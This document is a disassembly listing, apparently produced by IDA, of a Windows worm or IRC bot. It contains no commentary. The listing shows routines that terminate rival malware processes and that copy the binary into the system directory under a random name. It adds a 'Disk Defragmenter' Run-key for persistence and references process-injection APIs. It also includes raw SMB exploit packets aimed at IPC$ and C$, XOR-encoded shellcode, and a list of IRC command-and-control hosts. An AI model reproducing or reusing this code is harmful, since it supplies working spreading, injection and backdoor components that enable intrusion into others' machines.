sub_312032DA proc near ; DATA XREF: sub_31202E66+103�o
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
xor esi, esi
mov ds:dword_31206030, esi
loc_312032EA: ; CODE XREF: sub_312032DA+24�j
call sub_31202C14
test eax, eax
jnz short loc_31203300
push 1388h
call dword_312010D4 ; Sleep
jmp short loc_312032EA
; ---------------------------------------------------------------------------
loc_31203300: ; CODE XREF: sub_312032DA+17�j
lea eax, [ebp+var_4]
push esi
push eax
call dword_31201148 ; InternetGetConnectedState
test [ebp+var_4], 2
push 50h
mov ds:dword_31206034, esi
pop ebx
jz short loc_31203327
mov ds:dword_31206034, 1
add ebx, 46h
loc_31203327: ; CODE XREF: sub_312032DA+3E�j
push edi
call sub_31202BD5
mov esi, eax
mov ax, word ptr ds:dword_31206028
push eax
call dword_31201184 ; ntohs
mov [ebp+var_8], eax
lea eax, [ebp+var_8]
push 2
push eax
push offset loc_31205122
call sub_312037BA ; memcpy
mov eax, esi
push 4
xor eax, 0AAAAAAAAh
pop edi
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push edi
push eax
push offset loc_31205124
call sub_312037BA ; memcpy
add esp, 18h
cmp esi, 100007Fh
jz short loc_31203383
push esi
push offset sub_31203136
call sub_31202AF3
pop ecx
pop ecx
loc_31203383: ; CODE XREF: sub_312032DA+9A�j
; sub_312032DA+B7�j
push esi
push offset sub_31203196
call sub_31202AF3
pop ecx
dec edi
pop ecx
jnz short loc_31203383
test ebx, ebx
pop edi
jle short loc_312033AB
mov esi, ebx
loc_3120339A: ; CODE XREF: sub_312032DA+CF�j
push 0
push offset sub_3120321A
call sub_31202AF3
pop ecx
dec esi
pop ecx
jnz short loc_3120339A
loc_312033AB: ; CODE XREF: sub_312032DA+BC�j
push 0FFFFFFFFh
call dword_312010D4 ; Sleep
pop esi
xor eax, eax
pop ebx
leave
retn
sub_312032DA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_312033B9 proc near ; CODE XREF: sub_31203552+7E�p
; sub_312036BE+B5�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3120100C ; RegOpenKeyExA
test eax, eax
jnz short loc_312033EC
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31201010 ; RegDeleteValueA
push [ebp+arg_4]
call dword_31201014 ; RegCloseKey
loc_312033EC: ; CODE XREF: sub_312033B9+1C�j
pop ebp
retn
sub_312033B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_312033EE proc near ; CODE XREF: sub_31202C78+33�p
; sub_31203552+6F�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3120100C ; RegOpenKeyExA
test eax, eax
jz short loc_3120341A
push 1
pop eax
jmp short loc_31203444
; ---------------------------------------------------------------------------
loc_3120341A: ; CODE XREF: sub_312033EE+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_31201008 ; RegQueryValueExA
test eax, eax
jz short loc_31203439
push 2
pop esi
loc_31203439: ; CODE XREF: sub_312033EE+46�j
push [ebp+arg_10]
call dword_31201014 ; RegCloseKey
mov eax, esi
loc_31203444: ; CODE XREF: sub_312033EE+2A�j
pop esi
leave
retn
sub_312033EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31203447 proc near ; CODE XREF: sub_312035F2+96�p
; sub_312036BE+60�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31201000 ; RegCreateKeyExA
test eax, eax
jz short loc_31203470
push 1
pop eax
jmp short loc_31203497
; ---------------------------------------------------------------------------
loc_31203470: ; CODE XREF: sub_31203447+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31201004 ; RegSetValueExA
test eax, eax
jz short loc_3120348C
push 2
pop esi
loc_3120348C: ; CODE XREF: sub_31203447+40�j
push [ebp+arg_4]
call dword_31201014 ; RegCloseKey
mov eax, esi
loc_31203497: ; CODE XREF: sub_31203447+27�j
pop esi
pop ebp
retn
sub_31203447 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3120349A proc near ; CODE XREF: sub_31203552+8A�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_312010D0 ; lstrlenA
mov esi, eax
dec esi
test esi, esi
jle loc_3120354E
loc_312034BA: ; CODE XREF: sub_3120349A+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_312034C3
dec esi
jns short loc_312034BA
loc_312034C3: ; CODE XREF: sub_3120349A+24�j
push 0
push 2
call sub_31203834 ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_3120354E
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_312037C0 ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_3120382E ; Process32First
test eax, eax
jz short loc_3120354E
lea esi, [esi+ebx+1]
loc_3120350B: ; CODE XREF: sub_3120349A+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_31201114 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_3120353B
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_312010E8 ; OpenProcess
push 0
push eax
call dword_31201060 ; TerminateProcess
loc_3120353B: ; CODE XREF: sub_3120349A+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_31203828 ; Process32Next
test eax, eax
jnz short loc_3120350B
loc_3120354E: ; CODE XREF: sub_3120349A+1A�j
; sub_3120349A+38�j ...
pop esi
pop ebx
leave
retn
sub_3120349A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31203552 proc near ; CODE XREF: UPX0:31202E2F�p
var_130 = byte ptr -130h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push esi
lea eax, [ebp+var_28]
push edi
mov [ebp+var_28], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_24], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_20], offset aBotLoader ; "Bot Loader"
mov [ebp+var_1C], offset aSystray ; "SysTray"
mov [ebp+var_18], offset aWinupdate ; "WinUpdate"
mov [ebp+var_14], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_10], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_C], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_4], eax
mov [ebp+var_8], 8
mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_312035AD: ; CODE XREF: sub_31203552+99�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_130]
push eax
push ebx
push edi
push esi
call sub_312033EE
add esp, 14h
test eax, eax
jnz short loc_312035E4
push ebx
push edi
push esi
call sub_312033B9
lea eax, [ebp+var_130]
push eax
call sub_3120349A
add esp, 10h
loc_312035E4: ; CODE XREF: sub_31203552+79�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_312035AD
pop edi
pop esi
pop ebx
leave
retn
sub_31203552 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_312035F2 proc near ; CODE XREF: sub_312036BE+6A�p
; sub_312036BE+CA�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_31203607
push [ebp+arg_0]
call dword_3120106C ; DeleteFileA
loc_31203607: ; CODE XREF: sub_312035F2+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_312010B8 ; GetSystemDirectoryA
test eax, eax
jz locret_312036BC
push esi
call dword_31201128 ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_31202B14
mov esi, dword_31201090
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset a_exe ; ".exe"
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push offset asc_31205DE0 ; "\\"
push eax
call esi ; lstrcatA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_31201050 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_312010D0 ; lstrlenA
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aDiskDefragment ; "Disk Defragmenter"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_31203447
add esp, 14h
push ds:dword_31206000
call dword_312010A4 ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_31201054 ; WinExec
push 1F4h
call dword_312010D4 ; Sleep
push 0
call dword_31201070 ; ExitProcess
pop esi
locret_312036BC: ; CODE XREF: sub_312035F2+23�j
leave
retn
sub_312035F2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_312036BE proc near ; CODE XREF: UPX0:31202E34�p
var_DC = byte ptr -0DCh
var_78 = byte ptr -78h
var_14 = byte ptr -14h
push ebp
mov ebp, esp
sub esp, 0DCh
push ebx
push esi
push edi
lea eax, [ebp+var_78]
push 63h
xor edi, edi
push eax
push edi
call dword_31201048 ; GetModuleFileNameA
test eax, eax
jz loc_3120378F
lea eax, [ebp+var_DC]
push 63h
push eax
push offset aDiskDefragment ; "Disk Defragmenter"
mov esi, 80000002h
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
mov ds:dword_31206038, edi
call sub_312033EE
add esp, 14h
test eax, eax
jz short loc_31203732
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push esi
call sub_31203447
lea eax, [ebp+var_78]
push eax
push edi
call sub_312035F2
add esp, 1Ch
jmp short loc_3120378F
; ---------------------------------------------------------------------------
loc_31203732: ; CODE XREF: sub_312036BE+4C�j
lea eax, [ebp+var_78]
push eax
lea eax, [ebp+var_DC]
push eax
call dword_3120104C ; lstrcmpiA
test eax, eax
jnz short loc_3120377D
lea eax, [ebp+var_14]
push 14h
mov ebx, offset aClient ; "Client"
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push ebx
push edi
push esi
call sub_312033EE
add esp, 14h
test eax, eax
jnz short loc_3120378F
push ebx
push edi
push esi
mov ds:dword_31206038, 1
call sub_312033B9
add esp, 0Ch
jmp short loc_3120378F
; ---------------------------------------------------------------------------
loc_3120377D: ; CODE XREF: sub_312036BE+87�j
lea eax, [ebp+var_78]
push eax
lea eax, [ebp+var_DC]
push eax
call sub_312035F2
pop ecx
pop ecx
loc_3120378F: ; CODE XREF: sub_312036BE+1D�j
; sub_312036BE+72�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_312036BE endp
; =============== S U B R O U T I N E =======================================
sub_31203794 proc near ; CODE XREF: sub_31201248+2A�p
; sub_312014E6+27�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_31201044 ; VirtualAlloc
retn
sub_31203794 endp
; =============== S U B R O U T I N E =======================================
sub_312037A8 proc near ; CODE XREF: sub_31201248+EB�p
; sub_312014E6+75�p ...
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_31201040 ; VirtualFree
retn
sub_312037A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_312037BA proc near ; CODE XREF: sub_31201248+4B�p
; sub_31201651+93�p ...
jmp dword_31201124
sub_312037BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_312037C0 proc near ; CODE XREF: sub_31201582+20�p
; sub_31201651+128�p ...
jmp dword_31201120
sub_312037C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_312037C6 proc near ; CODE XREF: sub_31201651+9C�p
; sub_31201651+C5�p ...
jmp dword_3120111C
sub_312037C6 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_312037D0 proc near ; CODE XREF: sub_31201651+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_312037F0
loc_312037DC: ; CODE XREF: sub_312037D0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_312037DC
loc_312037F0: ; CODE XREF: sub_312037D0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_312037D0 endp
; ---------------------------------------------------------------------------
align 10h
loc_31203800: ; CODE XREF: UPX0:31203841�j
; UPX0:31203858�j
jmp dword ptr locret_3120110E+2
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31203810 proc near ; CODE XREF: sub_31202280+5�p
; UPX0:31202468�p
jmp dword ptr loc_3120110C
sub_31203810 endp
; ---------------------------------------------------------------------------
loc_31203816: ; DATA XREF: sub_31202E66+A�o
jmp dword ptr loc_31201100
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_3120381C proc near ; CODE XREF: sub_31202FDD+10C�p
; sub_31202FDD+119�p ...
jmp dword_312010FC
sub_3120381C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31203822 proc near ; CODE XREF: sub_31202FDD+35�p
jmp dword_312010F8
sub_31203822 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31203828 proc near ; CODE XREF: sub_3120349A+AB�p
jmp dword_31201064
sub_31203828 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_3120382E proc near ; CODE XREF: sub_3120349A+64�p
jmp dword_3120105C
sub_3120382E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31203834 proc near ; CODE XREF: sub_3120349A+2D�p
jmp dword_31201058
sub_31203834 endp
; ---------------------------------------------------------------------------
align 4
loc_3120383C: ; DATA XREF: sub_31202280�o
mov eax, offset dword_31203860
jmp loc_31203800
; ---------------------------------------------------------------------------
align 4
lea ecx, [ebp-1F0h]
jmp loc_31201E68
; ---------------------------------------------------------------------------
loc_31203853: ; DATA XREF: UPX0:loc_31202463�o
mov eax, offset dword_312038B8
jmp loc_31203800
; ---------------------------------------------------------------------------
align 10h
dword_31203860 dd 19930520h, 2, 31203880h, 1, 31203890h, 3 dup(0)
; DATA XREF: UPX0:loc_3120383C�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 312038A8h, 4 dup(0)
dd offset loc_31202374
dword_312038B8 dd 19930520h, 1, 312038D8h, 5 dup(0) dd 0FFFFFFFFh, 31203848h, 5C8h dup(0)
dword_31205000 dd 206h, 2400h, 31415352h, 800h, 10001h, 0A495BDEFh, 0DD499F8Eh
; DATA XREF: sub_312011D9+3A�o
dd 64DB1F45h, 0DE5B5C5h, 23CBE2AAh, 63639922h, 7318481Ch
dd 749AC3F2h, 4D855620h, 0AD0FE1CCh, 691506D3h, 0A8FD8D37h
dd 700B1698h, 45504FCEh, 324A3914h, 5C10E3EFh, 0DFBDD847h
dd 371EBA84h, 8B817380h, 7D4A0DF5h, 2DFE92E0h, 0C699C9C5h
dd 9C85E020h, 6A5068BDh, 8250B629h, 7F42C334h, 1C980811h
dd 9CE7B7B2h, 3D77899Dh, 0A4D3971Ah, 0A58D5029h, 8D463A96h
dd 1612E8FCh, 44AF10EBh, 0D0F84570h, 0B178966Ah, 0EB51439Fh
dd 7086A827h, 0DE098A39h, 0C1A1C214h, 0BF167A53h, 611A85C4h
dd 9829E70Fh, 8966209Eh, 0CB1FE53h, 0ECCA9407h, 0A11E75A3h
dd 0B4E8F91Dh, 1A4ECBC5h, 69D7F0DBh, 8C1A8739h, 18C67B94h
dd 3EB38213h, 0E0424BBFh, 8400EB67h, 0AA60B737h, 22D7D8B3h
dd 7A650480h, 86FF4BA6h, 0F6458558h, 56EEF96Eh, 32002FC9h
dd 0B7A63B4Ah, 0EBD3D87Ah
aCont db 'cont',0 ; DATA XREF: sub_312011C0+3�o
align 10h
loc_31205120: ; DATA XREF: sub_31201651+24E�o
; sub_31201651+260�o ...
jmp short loc_31205149
; ---------------------------------------------------------------------------
loc_31205122: ; DATA XREF: sub_312032DA+6B�o
adc dh, [esi]
loc_31205124: ; DATA XREF: sub_312032DA+87�o
aad 0AAh
stosb
stosd
loc_31205128: ; CODE XREF: UPX0:loc_31205149�p
pop ebp
xor ecx, ecx
mov cx, 226h
lea esi, [ebp+5]
mov edi, esi
loc_31205134: ; CODE XREF: UPX0:31205145�j
mov al, [esi]
cmp al, 99h
jnz short loc_3120513F
inc esi
mov al, [esi]
sub al, 30h
loc_3120513F: ; CODE XREF: UPX0:31205138�j
inc esi
xor al, 99h
mov [edi], al
inc edi
loop loc_31205134
jmp short near ptr loc_31205152+1
; ---------------------------------------------------------------------------
loc_31205149: ; CODE XREF: UPX0:loc_31205120�j
call loc_31205128
bound esp, cs:[ebp+67h]
loc_31205152: ; CODE XREF: UPX0:31205147�j
db 2Eh
jno short near ptr dword_31205000+0E8h
cdq
leave
cdq
leave
cdq
leave
adc bh, ch
mov ebp, 9916FD91h
leave
sal dword ptr [edx+68h], 0AAh
inc edx
std
db 66h
stosb
std
adc [edx-670EE3ECh], bh
cdq
leave
cdq
leave
leave
rep cwde
icebp
cwde
cdq
leave
xchg bl, [ecx-67F78E37h]
cdq
leave
cdq
leave
nop
pop edi
retf
; ---------------------------------------------------------------------------
dw 9237h
dd 0BB1C9659h, 99C99998h, 997518C9h, 0C9999BC9h, 0F1CDC999h
dd 0C9999898h, 0D571C999h, 99C99998h, 47ECE4C9h, 995D1854h
dd 0C9999BC9h, 9FF3C999h, 9BF398F3h, 9998AE71h, 0F3C999C9h
dd 1065E368h, 99981C1Ch, 1AC999C9h, 5EFFD975h, 999BBD9Dh
dd 0DC12FFC9h, 0DD10FF4Dh, 0DC129BBDh, 3333AC4Fh, 0DD103333h
dd 59B29DBDh, 91BDE514h, 45123232h, 66CA89F3h, 99981C2Ch
dd 71C999C9h, 99C9996Eh, 13C999C9h, 1A744167h, 5992D95Dh
dd 99341C96h, 99C999C9h, 0F19DF3C9h, 9989C999h, 0F1C999C9h
dd 0C999C999h, 0F3C99998h, 6471C999h, 0C999C999h, 0F367C999h
dd 1C10F0E3h, 0C99998E4h, 99F3C999h, 0C999F1C9h, 9998C999h
dd 2C66C9C9h, 0C999981Ch, 2171C999h, 0C999C999h, 0E86FC999h
dd 0F3C997C0h, 1C2C669Bh, 99C99998h, 993F71C9h, 99C999C9h
dd 0E5C1D8C9h, 0C959B2D5h, 0C99BF3C9h, 0C999F1C9h, 0C999C999h
dd 0E90414D9h, 99C99998h, 2871CAC9h, 0C999C999h, 688DC999h
dd 1C109161h, 0C99998F5h, 1AC3C999h, 0A7ED6661h, 0F35D12CDh
dd 0CBC9C999h, 98E42C66h, 0C999C999h, 98F52C66h, 0C999C999h
dd 0C9991071h, 0C999C999h, 96A6485Ah, 0F52C66C0h, 99C99998h
dd 99E071C9h, 99C999C9h, 0A7294CC9h, 149CF3EBh, 9998E904h
dd 0CAC999C9h, 0C999FE71h, 0C999C999h, 7126F434h, 71C999F3h
dd 99C999C5h, 0F9C999C9h, 0ECEF133Bh, 0C999A9A8h, 2 dup(0C999C999h)
dd 0EDFFC5B7h, 0FDE9ECE9h, 0FCE1FCB7h, 6 dup(0C999C999h)
dd 0F5CAC999h, 99E9FCFCh, 0EBFCF2C9h, 0AAF5FCF7h, 0C7C999ABh
dd 59AAF934h, 662A2DB4h, 0E6ACC91Eh, 0C9A5B7E7h, 9DB8BD9Ch
dd 71CDC982h, 99C99992h, 0BFC999C9h, 14513519h, 0A95BDFDh
dd 34C79172h, 99C871F9h, 99C999C9h, 0A5D212C9h, 0E180D512h
dd 6FAA529Ah, 9A2A8D14h, 8B12B9C8h, 59AA4A9Ah, 0AB9E5958h
dd 0A319DB9Bh, 6CECC999h, 85BDDDA2h, 0A2DF9EEDh, 44EB81E8h
dd 0BDC81255h, 2E964A9Ah, 0D812EB8Dh, 125A9A85h, 5A9A099Dh
dd 85BDDD10h, 181C10F8h, 99C99998h, 664966C9h, 12FEFD7Fh
dd 0C999A987h, 1295C212h, 821285C2h, 5A91C212h, 0FDF7FCB7h
dd 0B7h
dword_312053FC dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_31201651+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_31205488 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31201651+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 0
dword_31205534 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31201651+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_31205614 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31201651+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_31201651+BF�o
unicode 0, <C$>,0
a????? db '?????',0
align 8
dword_31205678 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31201651+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_312056E4 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31201651+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_31205788 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31201651+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_31205808 dd 401495h, 3, 40707Ch, 1, 0 dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_3120589C dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31201651+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_31205908 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31201651+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_3120597C dd 0 dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 4 dup(0)
dd 586E6957h, 72502050h, 6Fh, 0Ah dup(0)
dword_31205A40 dd 1004600h dd 1, 326E6957h, 7250206Bh, 6Fh, 0Ah dup(0)
dword_31205A7C dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Bh dup(0)
; DATA XREF: sub_31201651+41B�o
; sub_31201651+45D�o
dd 751C123Ch, 0Fh dup(0)
; ---------------------------------------------------------------------------
loc_31205AF8: ; DATA XREF: sub_31201651+44A�o
jmp short loc_31205B00
; ---------------------------------------------------------------------------
jmp short loc_31205B02
; ---------------------------------------------------------------------------
align 10h
loc_31205B00: ; CODE XREF: UPX0:loc_31205AF8�j
; DATA XREF: sub_31201651+5C�o
pop esp
pop esp
loc_31205B02: ; CODE XREF: UPX0:31205AFA�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_31205B0C dd 1CEC8166h dword_31205B10 dd 0E4FF07h aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31201BB8+62�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31201BB8+39�o
align 10h
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31201BB8+2A�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31201BB8+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31201BB8+8�o
; sub_31202E66+A9�o
align 4
aUterm10 db 'uterm10',0 ; DATA XREF: sub_31201C40:loc_31201D25�o
; UPX0:31202E05�o ...
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_31201C40+58�o
align 10h
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_31201C40:loc_31201C87�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_31201C40+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_31201C40+18�o
align 10h
off_31205BC0 dd offset aMoscowAdvokat_ ; DATA XREF: UPX0:3120252B�r
; UPX0:3120257E�r
; "moscow-advokat.ru"
dd offset aGazProm_ru ; "gaz-prom.ru"
dd offset aGraz_at_eu_und ; "graz.at.eu.undernet.org"
dd offset aFlanders_be_eu ; "flanders.be.eu.undernet.org"
dd offset aCaen_fr_eu_und ; "caen.fr.eu.undernet.org"
dd offset aBrussels_be_eu ; "brussels.be.eu.undernet.org"
dd offset aLosAngeles_ca_ ; "los-angeles.ca.us.undernet.org"
dd offset aWashington_dc_ ; "washington.dc.us.undernet.org"
dd offset aLondon_uk_eu_u ; "london.uk.eu.undernet.org"
dd offset aIrc_tsk_ru ; "irc.tsk.ru"
dd offset aLia_zanet_net ; "lia.zanet.net"
